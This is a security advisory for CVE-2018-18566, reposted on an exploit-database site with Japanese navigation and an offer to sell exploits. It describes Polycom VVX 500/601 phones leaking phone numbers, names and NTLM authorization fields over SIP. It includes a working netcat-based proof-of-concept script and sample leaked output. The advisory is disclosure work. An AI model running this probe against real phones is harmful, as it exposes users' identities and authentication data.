0day.today - 最大、世界でのデータベースを利用します。
![](/img/logo_green.jpg)
- 私たちは一つのメインのドメインを使用します。http://0day.today
- 材料のほとんどは 完全に無料
- あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります金
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
次の方法でご連絡することができます:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability
Polycom VVX 500 / VVX 601 5.8.0.12848 Information Exposure Vulnerability Product: VVX 500 / VVX 601 Manufacturer: Polycom Affected Version(s): <= 5.8.0.12848 Tested Version(s): 5.4.0.10182, 5.8.0.12848 Vulnerability Type: Information Exposure (CWE-200) Risk Level: Low Solution Status: Open Manufacturer Notification: 2018-08-29 Solution Date: 20??-??-?? Public Disclosure: 2018-10-23 CVE Reference: CVE-2018-18566 Authors of Advisory: Micha Borrmann (SySS GmbH) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: If a Polycom VVX 500/601 [1] is used with an on-premise installation with Skype for Business, the phone leaks the configured phone number and the name to unauthorized clients via SIP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The phone has a SIP service running by default on TCP port 5060. This service can be abused to leak information about the configuration of the phone. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Script getdatafrompolycom.sh #!/bin/sh # Micha Borrmann <[email protected]> OWNIP=192.168.100.102 if [ -z "$1" ] then echo "Please enter an IPv4 address as target" exit else TARGET=$1 fi echo 'OPTIONS sip:dummy SIP/2.0 Via: SIP/2.0/TCP '$OWNIP':5060 To: <sip:'$OWNIP':5060> From: <sip:127.0.0.1:5060> Call-ID: 1 CSeq: 1 OPTIONS Contact: <sip:127.0.0.1:5060> Accept: application/sdp Content-Length: 0 ' | recode ..ibmpc | netcat -w 1 $TARGET 5060 Start the script against a phone and see the result: $ ./getpolycom.sh 192.168.100.101 SIP/2.0 200 OK Via: SIP/2.0/TCP 192.168.100.102:5060 From: <sip:127.0.0.1:5060> To: "Micha Borrmann" <sip:192.168.100.102:5060>;tag=F75D6627-FE135FAE CSeq: 1 OPTIONS Call-ID: 1 Contact: <sip:[email protected];opaque=user:epid:XYZ...;abcd> Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,INFO,MESSAGE,SUBSCRIBE,NOTIFY,PRACK,UPDATE,REFER Supported: replaces,100rel User-Agent: Polycom/5.8.0.12848 PolycomVVX-VVX_601-UA/5.8.0.12848 Accept-Language: en P-Preferred-Identity: "Micha Borrmann" <sip:[email protected]>,<tel:+49XYZ334455661234;ext=1234> Accept: application/sdp,text/plain,message/sipfrag,application/dialog-info+xml Accept-Encoding: identity Supported: 100rel,replaces,norefersub,sdp-anat Authorization: NTLM qop="auth", realm="SIP Communications Service", opaque="1234CAFE", crand="cafe1234", cnum="11", targetname="server.example.com", response="0000000000000000000000000001" Content-Length: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install the new firmware which has disabled the SIP service by default. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-08-13: Detection of the vulnerability 2018-08-29: Vulnerability reported to manufacturer 2018-10-22: CVE number assigned 2018-10-23: Public release of the security advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product web sites for the phones https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx500.html https://support.polycom.com/content/support/emea/emea/en/support/voice/business-media-phones/vvx601.html [2] SySS Security Advisory SYSS-2018-028 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-028.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy/ # 0day.today [2024-07-02] #